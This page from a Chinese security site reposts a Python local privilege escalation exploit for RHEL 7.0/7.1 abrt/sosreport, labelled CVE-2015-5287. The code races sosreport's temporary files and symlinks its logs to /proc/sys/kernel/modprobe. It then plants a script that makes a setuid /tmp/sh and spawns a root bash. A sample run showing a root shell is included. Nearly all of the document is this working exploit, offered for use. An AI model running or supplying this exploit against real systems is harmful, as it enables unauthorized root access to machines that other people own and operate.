首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RHEL 7.0/7.1 - abrt/sosreport Local Root
来源:rebel at pulltheplug.org 作者:rebel 发布时间:2015-12-02  
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
 
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport:  sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
 
import os,sys,glob,time,sys,socket
 
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
 
pid = os.fork()
 
if pid == 0:
    os.execl("/usr/bin/sleep","sleep","100")
 
time.sleep(0.5)
 
print "crashing pid %d" % pid
 
os.kill(pid,11)
 
print "waiting for dump directory"
 
def waitpath(p):
    while 1:
        r = glob.glob(p)
        if len(r) > 0:
            return r
        time.sleep(0.05)   
 
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
 
print "dump directory: ", dumpdir
 
os.chdir(dumpdir)
 
print "waiting for sosreport directory"
 
sosreport = waitpath("sosreport-*")[0]
 
print "sosreport: ", sosreport
 
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
 
print "tmpfiles: ", tmpfiles
 
print "moving directory"
 
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
 
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
 
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
 
print "moving tmpfiles"
 
for x in tmpfiles:
    print "%s -> %s" % (x,x + ".old")
    os.rename(x, x + ".old")
    open(x, "w+").write("/tmp/hax.sh\n")
    os.chmod(x,0666)
 
 
os.chdir("/")
 
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
 
 
def trigger():
    open("/tmp/hax.sh","w+").write(payload)
    os.chmod("/tmp/hax.sh",0755)
    try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
    except: pass
    time.sleep(0.5)
    try:
        os.stat("/tmp/sh")
    except:
        print "could not create suid"
        sys.exit(-1)
    print "success"
    os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
    sys.exit(-1)
 
for x in xrange(0,60*10):
    if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
        print "done"
        trigger()
    time.sleep(1)
    sys.stderr.write(".")
 
print "timed out"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Advantech Switch Bash Environm
·Centos 7.1/Fedora 22 - abrt Lo
·Easy File Sharing Web Server 7
·Acunetix WVS 10 - Local Privil
·BisonWare BisonFTP Server 3.5
·Oracle BeeHive 2 Arbitrary Fil
·KNX ETS 4.1.5 Build 3246 Buffe
·Oracle BeeHive 2 Code Executio
·Dimofinf 3.0.0 SQL Injection
·Atlassian HipChat for Jira Plu
·Chkrootkit Local Privilege Esc
·OpenMRS 2.3 (1.11.4) XXE Injec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved